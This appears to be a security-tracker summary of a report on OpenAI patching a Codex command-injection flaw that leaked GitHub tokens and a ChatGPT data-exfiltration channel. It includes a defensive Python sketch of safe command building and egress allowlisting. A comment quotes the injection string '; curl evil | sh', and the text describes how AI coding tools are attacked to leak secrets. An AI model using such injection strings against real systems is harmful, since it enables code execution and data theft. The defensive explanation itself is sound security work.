OpenAI patches twin leaks as Codex slips and ChatGPT spills
Summary
OpenAI patched two separate security flaws in its AI tools: one in Codex (its coding agent) that let attackers steal GitHub tokens through command injection (inserting malicious commands into user-controlled input), and another in ChatGPT's code execution environment that created a hidden channel for silently exfiltrating user data without user approval. Both bugs could let attackers extract sensitive information, and researchers warn that giving AI tools the ability to run code and reach external systems inherently creates ongoing security risk.
Solution / Mitigation
OpenAI fixed the Codex vulnerability by 'tightening input validation around the vulnerable parameter and hardening how commands are constructed in the execution environment.' It addressed the ChatGPT flaw by 'tightening controls around outbound communication in the code execution environment.' Both patches were deployed before public disclosure.
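OpenAI has not published the patch code, so the following is only a minimal sketch of the two general techniques the statement names: building commands as argument lists (so attacker input is never parsed by a shell) with basic input validation, and gating outbound traffic on a host allowlist. All names here (`safe_run`, `egress_allowed`, `ALLOWED_HOSTS`, the `wc -l` command) are hypothetical illustrations, not OpenAI's implementation.

```python
import subprocess
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the execution sandbox may contact.
ALLOWED_HOSTS = {"api.github.com"}


def safe_run(filename: str) -> subprocess.CompletedProcess:
    """Run a command with the user-supplied value as a single argv element.

    Because no shell parses the command line, metacharacters such as
    ';', '|', or '$( )' in the input remain literal text.
    """
    # Basic input validation before the value reaches the command.
    if filename.startswith("-") or "\x00" in filename:
        raise ValueError(f"rejected suspicious filename: {filename!r}")
    # Argument-list form, deliberately without shell=True:
    # an input like '; curl evil | sh' is treated as one (nonexistent)
    # filename, not as a second command.
    return subprocess.run(["wc", "-l", filename],
                          capture_output=True, text=True)


def egress_allowed(url: str) -> bool:
    """Permit outbound requests only to explicitly allowlisted hosts."""
    return urlparse(url).hostname in ALLOWED_HOSTS
```

In this sketch an injection attempt such as `safe_run("; echo pwned")` simply fails with a "no such file" error instead of executing `echo`, and `egress_allowed` would block a covert upload to an attacker-controlled host while still permitting legitimate API traffic.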
Original source: https://www.csoonline.com/article/4152393/openai-patches-twin-leaks-as-codex-slips-and-chatgpt-spills.html
First tracked: March 31, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 92%